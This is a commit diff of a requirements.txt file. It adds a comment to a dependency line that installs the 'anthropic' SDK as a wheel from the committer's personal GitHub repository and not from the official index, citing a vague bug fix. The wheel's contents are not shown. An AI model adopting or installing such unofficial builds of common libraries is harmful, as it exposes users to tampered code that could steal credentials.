AppleBotzz commited on
Commit
9a645c3
1 Parent(s): f0f497e

Update requirements.txt

Browse files
Files changed (1) hide show
  1. requirements.txt +1 -1
requirements.txt CHANGED
@@ -1,4 +1,4 @@
1
- https://github.com/AppleBotzz/Backup-Anthropic-Builds/raw/main/anthropic-0.21.3-py3-none-any.whl
2
  requests
3
  python-dotenv # If you're using dotenv for environment variables
4
  Pillow
 
1
+ https://github.com/AppleBotzz/Backup-Anthropic-Builds/raw/main/anthropic-0.21.3-py3-none-any.whl # I had to fix a specific dumbass bug related to my system -_-
2
  requests
3
  python-dotenv # If you're using dotenv for environment variables
4
  Pillow